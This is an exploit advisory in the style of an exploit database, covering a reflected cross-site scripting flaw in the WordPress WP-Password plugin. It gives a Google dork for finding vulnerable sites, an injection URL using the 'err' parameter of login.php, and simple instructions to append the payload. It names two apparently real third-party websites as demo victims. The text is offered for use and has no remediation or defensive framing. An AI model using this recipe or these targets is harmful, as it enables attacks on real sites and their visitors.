# WordPress WP-Password Plugin XSS Vulnerability
###########################
[+] Author: Arash Cyber
[+] Exploit Title: WordPress WP-Password Plugin XSS Vulnerability
[+] Find: 2/15/2014
[+] Category: WebApp
[+] Google Dork: inurl:"/wp-content/plugins/wp-password/login.php"
[+] Tested On: Windows - Linux
[+] Site: Attacker-Team.org
###########################################
###########################################
# Type: XSS Vulnerability
# Exploit: http://Site.com/{Path}/wp-content/plugins/wp-password/login.php?err={Your Text}
# Explaination: Copy The Dork In Google - Open A Site - Delete All Texts After login.php
Copy This Code At The End Of The Url: ?err={Your Text} - And End :D
+Demo:
-http://fukushXimaboys.com/wp-content/plugins/wp-password/login.php?err=Your Text
-http://wakayXama-jc.net/2012/wp-content/plugins/wp-password/login.php?err=Your Text
###########################################
###########################################
Greets to: Offensive - Rooter - Hex - Hamoon Pars - Anonymous - Virangar - Saeed.Jok3r
The Smith - MR.MOJTABA - D@ni - Gold___Hat - ArmiN_C - Alireza_rusher - Mahdi Smok
Anti Security - Inj3ct0r - MR.BBC - SiR.Alone1993 - MR.J@N - mR.al!_kh@n_@zzam
###########################################
###########################################